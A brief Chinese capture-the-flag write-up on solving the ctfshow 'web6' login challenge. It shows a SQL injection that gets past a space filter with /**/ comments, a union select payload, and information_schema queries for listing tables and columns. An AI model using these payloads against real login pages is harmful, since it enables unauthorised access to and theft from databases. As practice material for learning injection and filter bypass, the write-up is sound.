Ctfshow web-we6 WP
进去看见一个login界面,看上去有点眼熟,好像做过,但是尝试之前做过的方法,回显始终是sql infect error,这样的回显表示输入的值中有非法字符,最后尝试下来是空格被顾虑了,用/**/代替
原来 union select 1,2,3
Web6: union/**/select/**/1,2,3
这样的话,传统艺能手工注入
判断显示位
获取当前连接的数据库
获取数据库中所有表的表名:
Select table_name from information_schema.tables where table_schema=”数据库”
获取表中所有字段的字段名
Select column_name from information_schema.columns where table_name=”表名”
获取当前数据库下的数据表
获取字段
最后拿到flag
这里不建议各位师傅直接用sqlmap一把嗦,手工爆破能让你知道问题出在哪里,是字符型注入还是数字型,用单引号还是双引号,怎么绕过过滤,现在的练习是发现更多的过关经验,如果都sqlmap一把嗦,那就真没意思了